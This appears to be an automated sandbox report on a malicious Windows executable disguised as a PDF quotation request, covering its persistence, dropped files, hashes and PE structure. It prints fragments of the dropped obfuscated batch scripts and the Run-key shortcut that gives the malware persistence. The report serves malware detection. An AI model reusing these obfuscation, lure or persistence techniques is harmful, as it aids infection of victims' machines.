                                            • Avira URL Cloud: safe
                                            		unknown

                                            World Map of Contacted IPs

                                            • No. of IPs < 25%
                                            • 25% < No. of IPs < 50%
                                            • 50% < No. of IPs < 75%
                                            • 75% < No. of IPs

                                            Public IPs

                                            IPDomainCountryFlagASNASN NameMalicious
                                            172.217.19.238
                                            		drive.google.comUnited States
                                            		15169GOOGLEUSfalse
                                            142.250.181.1
                                            		drive.usercontent.google.comUnited States
                                            		15169GOOGLEUSfalse

                                            General Information

                                            Joe Sandbox version:41.0.0 Charoite
                                            Analysis ID:1580362
                                            Start date and time:2024-12-24 11:27:45 +01:00
                                            Joe Sandbox product:CloudBasic
                                            Overall analysis duration:0h 8m 59s
                                            Hypervisor based Inspection enabled:false
                                            Report type:full
                                            Cookbook file name:default.jbs
                                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                            Number of analysed new started processes analysed:20
                                            Number of new started drivers analysed:0
                                            Number of existing processes analysed:0
                                            Number of existing drivers analysed:0
                                            Number of injected processes analysed:0
                                            Technologies:
                                            • HCA enabled
                                            • EGA enabled
                                            • AMSI enabled
                                            Analysis Mode:default
                                            Analysis stop reason:Timeout
                                            Sample name:RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe
                                            Detection:MAL
                                            Classification:mal100.troj.evad.winEXE@21/7@2/2
                                            EGA Information:
                                            • Successful, ratio: 100%
                                            HCA Information:
                                            • Successful, ratio: 99%
                                            • Number of executed functions: 61
                                            • Number of non-executed functions: 266
                                            Cookbook Comments:
                                            • Found application associated with file extension: .exe

                                            Warnings

                                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                            • Excluded IPs from analysis (whitelisted): 13.107.246.63, 20.12.23.50
                                            • Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                            • Not all processes where analyzed, report is missing behavior information
                                            • Report creation exceeded maximum time and may have missing disassembly code information.
                                            • Report size exceeded maximum capacity and may have missing behavior information.
                                            • Report size exceeded maximum capacity and may have missing disassembly code.
                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                            • Report size getting too big, too many NtQueryValueKey calls found.
                                            • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                            • VT rate limit hit for: RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe

                                            Simulations

                                            Behavior and APIs

                                            TimeTypeDescription
                                            05:28:39API Interceptor2x Sleep call for process: RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe modified
                                            05:29:02API Interceptor4x Sleep call for process: Csswqtmk.PIF modified
                                            05:29:23API Interceptor9x Sleep call for process: kmtqwssC.pif modified
                                            11:28:54AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Csswqtmk C:\Users\Public\Csswqtmk.url
                                            11:29:02AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Csswqtmk C:\Users\Public\Csswqtmk.url

                                            Joe Sandbox View / Context

                                            IPs

                                            No context

                                            Domains

                                            No context

                                            ASNs

                                            No context

                                            JA3 Fingerprints

                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                            a0e9f5d64349fb13191bc781f81f42e1fnCae9FQhg.exeGet hashmaliciousLummaCBrowse
                                            • 142.250.181.1
                                            • 172.217.19.238
                                            bG89JAQXz2.exeGet hashmaliciousLummaCBrowse
                                            • 142.250.181.1
                                            • 172.217.19.238
                                            SFtDA07UDr.exeGet hashmaliciousLummaCBrowse
                                            • 142.250.181.1
                                            • 172.217.19.238
                                            3zg6i6Zu1u.exeGet hashmaliciousLummaCBrowse
                                            • 142.250.181.1
                                            • 172.217.19.238
                                            oiF7u78bY2.exeGet hashmaliciousLummaCBrowse
                                            • 142.250.181.1
                                            • 172.217.19.238
                                            L5Kgf2Tvkc.exeGet hashmaliciousLummaCBrowse
                                            • 142.250.181.1
                                            • 172.217.19.238
                                            LVDdWBGnVE.exeGet hashmaliciousLummaC StealerBrowse
                                            • 142.250.181.1
                                            • 172.217.19.238
                                            O5Vg1CJsxN.exeGet hashmaliciousLummaC, StealcBrowse
                                            • 142.250.181.1
                                            • 172.217.19.238
                                            2oM46LNCOo.exeGet hashmaliciousLummaCBrowse
                                            • 142.250.181.1
                                            • 172.217.19.238
                                            J18uCKmoAw.exeGet hashmaliciousLummaCBrowse
                                            • 142.250.181.1
                                            • 172.217.19.238

                                            Dropped Files

                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                            C:\Users\Public\Libraries\kmtqwssC.pifDelivery Confirmation Forms - Contact Form TS4047117 pdf.exeGet hashmaliciousDBatLoader, FormBookBrowse
                                              F.O Pump Istek,Docx.batGet hashmaliciousDBatLoader, PureLog Stealer, Snake KeyloggerBrowse
                                                D.G Governor Istek,Docx.exeGet hashmaliciousDBatLoader, PureLog Stealer, Snake KeyloggerBrowse
                                                  qDKTsL1y44.exeGet hashmaliciousDBatLoaderBrowse
                                                    PRODUCT.batGet hashmaliciousAveMaria, DBatLoader, UACMeBrowse
                                                      purchaseorder.batGet hashmaliciousAveMaria, DBatLoader, UACMeBrowse
                                                        PO11550.exeGet hashmaliciousAveMaria, DBatLoader, UACMeBrowse
                                                          SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exeGet hashmaliciousAgentTesla, DBatLoader, RedLineBrowse
                                                            PCMNil7wkU.exeGet hashmaliciousAgentTesla, AsyncRAT, DBatLoader, RedLineBrowse
                                                              tTIYCp2sf4.exeGet hashmaliciousRemcos, DBatLoaderBrowse

                                                                Created / dropped Files

                                                                C:\Users\Public\Csswqtmk.url

                                                                Download File
                                                                Process:C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe
                                                                File Type:MS Windows 95 Internet shortcut text (URL=<file:"C:\\Users\\Public\\Libraries\\Csswqtmk.PIF">), ASCII text, with CRLF line terminators
                                                                Category:dropped
                                                                Size (bytes):104
                                                                Entropy (8bit):5.148515771830924
                                                                Encrypted:false
                                                                SSDEEP:3:HRAbABGQYmTWAX+rSF55i0XMb1kmjHovsbxAQRVbb:HRYFVmTWDyzI1xyExAEVbb
                                                                MD5:B2CA6E15D33A74F5E9D62C00D9E84429
                                                                SHA1:9593875EBC01527058A10DF88A308235EB5970F1
                                                                SHA-256:07A12EAB40B8471728CC9C6A706B94D6448D43C080B98A551D33A9A2A9E0F3A7
                                                                SHA-512:BFFE6254D4EE0470AA266B5B92CC6CEEA928254A341AC10BF544888147886B286C8E22871F7C74AA018DCD8D47EA7F3BB0ED67F278B33FA763E677B1D57C7DD1
                                                                Malicious:true
                                                                Preview:[InternetShortcut]..URL=file:"C:\\Users\\Public\\Libraries\\Csswqtmk.PIF"..IconIndex=950540..HotKey=58..

                                                                C:\Users\Public\CsswqtmkF.cmd

                                                                Download File
                                                                Process:C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe
                                                                File Type:DOS batch file, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                Category:dropped
                                                                Size (bytes):15789
                                                                Entropy (8bit):4.658965888116939
                                                                Encrypted:false
                                                                SSDEEP:384:wleG1594aKczJRP1dADCDswtJPZ9KZVst1U:LA4aLz08JaJ
                                                                MD5:CCE3C4AEE8C122DD8C44E64BD7884D83
                                                                SHA1:C555C812A9145E2CBC66C7C64BA754B0C7528D6D
                                                                SHA-256:4A12ABB62DD0E5E1391FD51B7448EF4B9DA3B3DC83FF02FB111E15D6A093B5E8
                                                                SHA-512:EA23EDFB8E3CDA49B78623F6CD8D0294A4F4B9B11570E8478864EBDEE39FCC6B8175B52EB947ED904BE27B5AF2535B9CA08595814557AE569020861A133D827D
                                                                Malicious:false
                                                                Preview:.@echo off..@% %e%.%c%o..%h%. .......%o%r.r.r.....% %.......%o%..%f% .%f%o%..s%...... .%e%.r.%t%...o..r.% %.....%"%.......%u%.%T%r..%A%..%j%r........%=%.. o......%s%....o...%e%.....%t%.% %........%"%.r.......o%..%uTAj%"%.. . ..%N%.r r.... %U%... .oo...%M%r.........%j%.....%=%.....o....%=%.%"%r...... %..%uTAj%"% .....%m%..oo%X%.o.. %m%.....or.%w%....%O%.%g%.....%B%.o .r.. %W%..%D%........%t%o.r...%%NUMj%h% ...o.%t%..%t%o......o%p%.........%"% .r%..%uTAj%"% .... ..%G%...o.. ..%n%..rr..%j%..o......%D%...o .r..%R%r.

                                                                C:\Users\Public\Libraries\Csswqtmk

                                                                Download File
                                                                Process:C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):615455
                                                                Entropy (8bit):7.387292819052727
                                                                Encrypted:false
                                                                SSDEEP:12288:TUVIMK/uSLZ963Xf4tTF3iAdjOeD/BIMn0h8OYRBl3VjUcSxxi1nHW8:TUGMK2UIqTFSAUebt0fYXvjUtxs1nZ
                                                                MD5:454418FC0A479F060549F4211A41CD5A
                                                                SHA1:3455DA697CA2B9E8B74A0A4BF3A4744F8209B14A
                                                                SHA-256:7F57C911C458D6B2E08C6C568FF81917574CD5A56233CA69296A53DC7F1D1420
                                                                SHA-512:75DDBDF1B40CF19F6B3199A649D0E14745EB20E95C371A65244A6C75C23DFC9C5660570A597109FFB44C1C9C6AACAF3119A339EAC1FCD1D90248F7245D35D586
                                                                Malicious:true
                                                                Preview:...Y#..K .$&...$..... ..... ..'#..".'.!.......&#......%..!$.....!... '%!$.&$. .#.....#& ."......'...".'.......Y#..KN $.!.. .'...Y#..K...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................,....4!.....1...5... ....|.Z....M....)zKZ<}......d....p..D..

                                                                C:\Users\Public\Libraries\Csswqtmk.PIF

                                                                Download File
                                                                Process:C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe
                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):1525248
                                                                Entropy (8bit):7.156307736710648
                                                                Encrypted:false
                                                                SSDEEP:24576:ybzkvy/WQ9JGhRg8MLr12geV421wu0L8UnE923HZshmMv6J:ybzgZh+HV21W8UE923HZrs6
                                                                MD5:AACA1B72E0AC5DC118B0F981667E8179
                                                                SHA1:162A85D0D2D6EEC0FB05D043167BBD8451183735
                                                                SHA-256:8A63BBD795519E52538E95891F205D78A4CCC474C24E80D8EFAB364AD4CA2335
                                                                SHA-512:B066F98AA3FF546753E6AC2CC76918AB90B46859ECADB7B1940BF562EDBB389383F2A09146B71863073C3434A408DAF5FA93968603011D647EDE2AA9C9E13426
                                                                Malicious:true
                                                                Antivirus:
                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                • Antivirus: ReversingLabs, Detection: 66%
                                                                Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.....................J......d.............@..............................................@...............................+...P..........................xy...................................................................................text...|........................... ..`.itext.............................. ..`.data............ ..................@....bss.....I...0...........................idata...+.......,..................@....tls....4............H...................rdata...............H..............@..@.reloc..xy.......z...J..............@..B.rsrc........P......................@..@.....................F..............@..@................................................................................................

                                                                C:\Users\Public\Libraries\FX.cmd

                                                                Download File
                                                                Process:C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe
                                                                File Type:DOS batch file, Unicode text, UTF-8 text, with CRLF line terminators
                                                                Category:dropped
                                                                Size (bytes):8556
                                                                Entropy (8bit):4.623706637784657
                                                                Encrypted:false
                                                                SSDEEP:192:dSSQx41VVrTlS2owuuWTtkY16Wdhdsu0mYKDCIfYaYuX1fcDuy:Vrhgwuua5vdnQaCIVJF6uy
                                                                MD5:60CD0BE570DECD49E4798554639A05AE
                                                                SHA1:BD7BED69D9AB9A20B5263D74921C453F38477BCB
                                                                SHA-256:CA6A6C849496453990BECEEF8C192D90908C0C615FA0A1D01BCD464BAD6966A5
                                                                SHA-512:AB3DBDB4ED95A0CB4072B23DD241149F48ECFF8A69F16D81648E825D9D81A55954E5DD9BC46D3D7408421DF30C901B9AD1385D1E70793FA8D715C86C9E800C57
                                                                Malicious:true
                                                                Preview:@echo off..set "MJtc=Iet "..@%.r.......%e%...%c%...r....%h%.....%o%........% % .....%o%...%f%.o.%f%......%..s%.......%e%.%t%.. .....% %.rr.. .%"%...%w%......%o%...o..%t%r.....%c%....%=%... . .%s%...... %e%....%t%....% %........ %"% o...%..%wotc%"%.%n% r .%O%...%P%.. ..%t%.%=%...... o..%=%......%"%....r...%..%wotc%"aeeYdDdanR%nOPt%s://"..%wotc%"%..........%a%.%e%......%e%.r..%Y%..%d%.....r....%D%.. %d% ... .%a%.. ...%n%.. ..%R%........%%nOPt%s%...... .%:%.. %/%....%/%r......%"%.....r.%..%wotc%"%...... ...%U%.o..%g%.r.%

                                                                C:\Users\Public\Libraries\NEO.cmd

                                                                Download File
                                                                Process:C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe
                                                                File Type:DOS batch file, Unicode text, UTF-8 text, with very long lines (420), with CRLF line terminators
                                                                Category:dropped
                                                                Size (bytes):46543
                                                                Entropy (8bit):4.705001079878445
                                                                Encrypted:false
                                                                SSDEEP:768:Ud6T6yIssKMyD/LgZ0+9Z2noufIBUEADZQp2H8ZLq:UdQFIssKMyjL4X2T8UbZT
                                                                MD5:637A66953F03B084808934ED7DF7192F
                                                                SHA1:D3AE40DFF4894972A141A631900BD3BB8C441696
                                                                SHA-256:41E1F89A5F96F94C2C021FBC08EA1A10EA30DAEA62492F46A7F763385F95EC20
                                                                SHA-512:2A0FEDD85722A2701D57AA751D5ACAA36BBD31778E5D2B51A5A1B21A687B9261F4685FD12E894244EA80B194C76E722B13433AD9B649625D2BC2DB4365991EA3
                                                                Malicious:false
                                                                Preview:@echo off..set "EPD=sPDet "..@%...... or%e%.........%c%......%h%.........o%o%.or......% %.o.ro...%o%.%f%...r.....%f%....r....%..s%. %e%.....%t% % % rrr....%"%.....%E%....%J%.. ....%O%.%h% .......%=%........%s%.. ..%e%....%t%....% %...o...%"%.%..%EJOh%"%.%r% %H%..%C%........%N%....o ....%=%..........%=% .%"%..%..%EJOh%"%.....%K%.%z%..r%j%........%L%..%c%. o.......%f%. o..%x%.%X%.........r%V%.%J%.....%%rHCN%k%.... ...%"%........%..%EJOh%"%.o.....%a%or%g%..o.... ..%u% ..%P%.....o...%X%.. .......%c% .....%U%.%I%. .

                                                                C:\Users\Public\Libraries\kmtqwssC.pif

                                                                Download File
                                                                Process:C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe
                                                                File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):175800
                                                                Entropy (8bit):6.631791793070417
                                                                Encrypted:false
                                                                SSDEEP:3072:qjyOm0e6/bIhbuwxlEb1MpG+xUEyAn0fYuDGOpPXFZ7on+gUxloDMq:qjyl6ebX45OG+xUEWfYUGOpPXFZ7on+G
                                                                MD5:22331ABCC9472CC9DC6F37FAF333AA2C
                                                                SHA1:2A001C30BA79A19CEAF6A09C3567C70311760AA4
                                                                SHA-256:BDFA725EC2A2C8EA5861D9B4C2F608E631A183FCA7916C1E07A28B656CC8EC0C
                                                                SHA-512:C7F5BAAD732424B975A426867D3D8B5424AA830AA172ED0FF0EF630070BF2B4213750E123A36D8C5A741E22D3999CA1D7E77C62D4B77D6295B20A38114B7843C
                                                                Malicious:true
                                                                Antivirus:
                                                                • Antivirus: ReversingLabs, Detection: 3%
                                                                Joe Sandbox View:
                                                                • Filename: Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, Detection: malicious, Browse
                                                                • Filename: F.O Pump Istek,Docx.bat, Detection: malicious, Browse
                                                                • Filename: D.G Governor Istek,Docx.exe, Detection: malicious, Browse
                                                                • Filename: qDKTsL1y44.exe, Detection: malicious, Browse
                                                                • Filename: PRODUCT.bat, Detection: malicious, Browse
                                                                • Filename: purchaseorder.bat, Detection: malicious, Browse
                                                                • Filename: PO11550.exe, Detection: malicious, Browse
                                                                • Filename: SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, Detection: malicious, Browse
                                                                • Filename: PCMNil7wkU.exe, Detection: malicious, Browse
                                                                • Filename: tTIYCp2sf4.exe, Detection: malicious, Browse
                                                                Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................................................................................................................................................................................................................................................................................PE..L....>.{..................................... ....@.......................... .......c........... ..............................................................H....................................................................................text............................... ..`.data........ ...P..................@....tls.................`..............@....rdata...............b..............@..P.idata... ...........d..............@..@.edata...............|..8...,...@...@..@

                                                                Static File Info

                                                                General

                                                                File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                Entropy (8bit):7.156307736710648
                                                                TrID:
                                                                • Win32 Executable (generic) a (10002005/4) 93.60%
                                                                • Win32 Executable Borland Delphi 7 (665061/41) 6.22%
                                                                • Windows Screen Saver (13104/52) 0.12%
                                                                • Win16/32 Executable Delphi generic (2074/23) 0.02%
                                                                • Generic Win/DOS Executable (2004/3) 0.02%
                                                                File name:RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe
                                                                File size:1'525'248 bytes
                                                                MD5:aaca1b72e0ac5dc118b0f981667e8179
                                                                SHA1:162a85d0d2d6eec0fb05d043167bbd8451183735
                                                                SHA256:8a63bbd795519e52538e95891f205d78a4ccc474c24e80d8efab364ad4ca2335
                                                                SHA512:b066f98aa3ff546753e6ac2cc76918ab90b46859ecadb7b1940bf562edbb389383f2a09146b71863073c3434a408daf5fa93968603011d647ede2aa9c9e13426
                                                                SSDEEP:24576:ybzkvy/WQ9JGhRg8MLr12geV421wu0L8UnE923HZshmMv6J:ybzgZh+HV21W8UE923HZrs6
                                                                TLSH:36658BA1D65383E1D27A18743F0B32F9E82C3C2CAA70948D6FDC593AD621952EC37536
                                                                File Content Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................

                                                                File Icon

                                                                Icon Hash:1b2b4380030b8b4b

                                                                Static PE Info

                                                                General

                                                                Entrypoint:0x470764
                                                                Entrypoint Section:.itext
                                                                Digitally signed:false
                                                                Imagebase:0x400000
                                                                Subsystem:windows gui
                                                                Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                                                                DLL Characteristics:
                                                                Time Stamp:0x2A425E19 [Fri Jun 19 22:22:17 1992 UTC]
                                                                TLS Callbacks:
                                                                CLR (.Net) Version:
                                                                OS Version Major:4
                                                                OS Version Minor:0
                                                                File Version Major:4
                                                                File Version Minor:0
                                                                Subsystem Version Major:4
                                                                Subsystem Version Minor:0
                                                                Import Hash:22bd506e939ff48fc3f7134a63d5ffe7

                                                                Entrypoint Preview

                                                                Instruction
                                                                push ebp
                                                                mov ebp, esp
                                                                add esp, FFFFFFF0h
                                                                mov eax, 0046FD24h
                                                                call 00007F3070C9C5EDh
                                                                mov eax, dword ptr [00472C70h]
                                                                mov eax, dword ptr [eax]
                                                                call 00007F3070CF01E9h
                                                                mov ecx, dword ptr [00472D6Ch]
                                                                mov eax, dword ptr [00472C70h]
                                                                mov eax, dword ptr [eax]
                                                                mov edx, dword ptr [0046FAB0h]
                                                                call 00007F3070CF01E9h
                                                                mov ecx, dword ptr [00472DACh]
                                                                mov eax, dword ptr [00472C70h]
                                                                mov eax, dword ptr [eax]
                                                                mov edx, dword ptr [0046D670h]
                                                                call 00007F3070CF01D1h
                                                                mov eax, dword ptr [00472C70h]
                                                                mov eax, dword ptr [eax]
                                                                call 00007F3070CF0245h
                                                                call 00007F3070C9A680h
                                                                lea eax, dword ptr [eax+00h]
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al

                                                                Data Directories

                                                                NameVirtual AddressVirtual Size Is in Section
                                                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_IMPORT0x780000x2b9e.idata
                                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0x850000xf8200.rsrc
                                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x7d0000x7978.reloc
                                                                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_TLS0x7c0000x18.rdata
                                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_IAT0x788180x6c4.idata
                                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                Sections

                                                                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                .text0x10000x6ef7c0x6f0006a83eb4845c280b8a395ea67cf0eaaecFalse0.5238422015765766data6.530963238622684IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                .itext0x700000x7c40x8008c84de7ddc650e8b4731f318bcd09386False0.6103515625data6.080503925923311IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                .data0x710000x1e180x2000ecb5efb5690f584dd9bcae579b1082b9False0.387451171875data3.7569307685335174IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                .bss0x730000x49b80x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                .idata0x780000x2b9e0x2c003645f186dbb107a814e6f7788eda8aa6False0.3164950284090909data5.198465793856343IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                .tls0x7b0000x340x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                .rdata0x7c0000x180x200d510f38b6ed52130ca157449bd04a150False0.05078125data0.2044881574398449IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                .reloc0x7d0000x79780x7a00947fd0f5692db3c8d44f889b13b61cf6False0.6156826331967213data6.671169499572467IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                .rsrc0x850000xf82000xf8200e6034154538d55075dea85c7ceeb6f60False0.5909083753148615data6.999795247535367IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                Resources

                                                                NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                RT_CURSOR0x85ec80x134Targa image data - Map 64 x 65536 x 1 +32 "\001"EnglishUnited States0.38636363636363635
                                                                RT_CURSOR0x85ffc0x134dataEnglishUnited States0.4642857142857143
                                                                RT_CURSOR0x861300x134dataEnglishUnited States0.4805194805194805
                                                                RT_CURSOR0x862640x134dataEnglishUnited States0.38311688311688313
                                                                RT_CURSOR0x863980x134dataEnglishUnited States0.36038961038961037
                                                                RT_CURSOR0x864cc0x134dataEnglishUnited States0.4090909090909091
                                                                RT_CURSOR0x866000x134Targa image data - RGB 64 x 65536 x 1 +32 "\001"EnglishUnited States0.4967532467532468
                                                                RT_BITMAP0x867340x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.43103448275862066
                                                                RT_BITMAP0x869040x1e4Device independent bitmap graphic, 36 x 19 x 4, image size 380EnglishUnited States0.46487603305785125
                                                                RT_BITMAP0x86ae80x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.43103448275862066
                                                                RT_BITMAP0x86cb80x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.39870689655172414
                                                                RT_BITMAP0x86e880x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.4245689655172414
                                                                RT_BITMAP0x870580x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.5021551724137931
                                                                RT_BITMAP0x872280x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.5064655172413793
                                                                RT_BITMAP0x873f80x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.39655172413793105
                                                                RT_BITMAP0x875c80x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.5344827586206896
                                                                RT_BITMAP0x877980x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.39655172413793105
                                                                RT_BITMAP0x879680x9c6e8Device independent bitmap graphic, 1002 x 213 x 24, image size 640704EnglishUnited States0.45959540783838787
                                                                RT_BITMAP0x1240500xc0Device independent bitmap graphic, 16 x 11 x 4, image size 88, 16 important colorsEnglishUnited States0.5208333333333334
                                                                RT_BITMAP0x1241100xe0Device independent bitmap graphic, 16 x 15 x 4, image size 120, 16 important colorsEnglishUnited States0.42857142857142855
                                                                RT_BITMAP0x1241f00xe0Device independent bitmap graphic, 16 x 15 x 4, image size 120, 16 important colorsEnglishUnited States0.4955357142857143
                                                                RT_BITMAP0x1242d00xe0Device independent bitmap graphic, 16 x 15 x 4, image size 120, 16 important colorsEnglishUnited States0.38392857142857145
                                                                RT_BITMAP0x1243b00xc0Device independent bitmap graphic, 16 x 11 x 4, image size 88, 16 important colorsEnglishUnited States0.4947916666666667
                                                                RT_BITMAP0x1244700xc0Device independent bitmap graphic, 16 x 11 x 4, image size 88, 16 important colorsEnglishUnited States0.484375
                                                                RT_BITMAP0x1245300xe0Device independent bitmap graphic, 16 x 15 x 4, image size 120, 16 important colorsEnglishUnited States0.42410714285714285
                                                                RT_BITMAP0x1246100xc0Device independent bitmap graphic, 16 x 11 x 4, image size 88, 16 important colorsEnglishUnited States0.5104166666666666
                                                                RT_BITMAP0x1246d00xe0Device independent bitmap graphic, 16 x 15 x 4, image size 120, 16 important colorsEnglishUnited States0.5
                                                                RT_BITMAP0x1247b00xe8Device independent bitmap graphic, 16 x 16 x 4, image size 128EnglishUnited States0.4870689655172414
                                                                RT_BITMAP0x1248980xc0Device independent bitmap graphic, 16 x 11 x 4, image size 88, 16 important colorsEnglishUnited States0.4895833333333333
                                                                RT_BITMAP0x1249580xe0Device independent bitmap graphic, 16 x 15 x 4, image size 120, 16 important colorsEnglishUnited States0.3794642857142857
                                                                RT_ICON0x124a380x468Device independent bitmap graphic, 16 x 32 x 32, image size 1024, resolution 1889 x 1889 px/m0.2969858156028369
                                                                RT_ICON0x124ea00x988Device independent bitmap graphic, 24 x 48 x 32, image size 2304, resolution 1889 x 1889 px/m0.20040983606557378
                                                                RT_ICON0x1258280x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4096, resolution 1889 x 1889 px/m0.14681050656660413
                                                                RT_ICON0x1268d00x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9216, resolution 1889 x 1889 px/m0.10394190871369295
                                                                RT_ICON0x128e780x1249PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced0.9374065370647298
                                                                RT_DIALOG0x12a0c40x52data0.7682926829268293
                                                                RT_DIALOG0x12a1180x52data0.7560975609756098
                                                                RT_STRING0x12a16c0x34data0.5
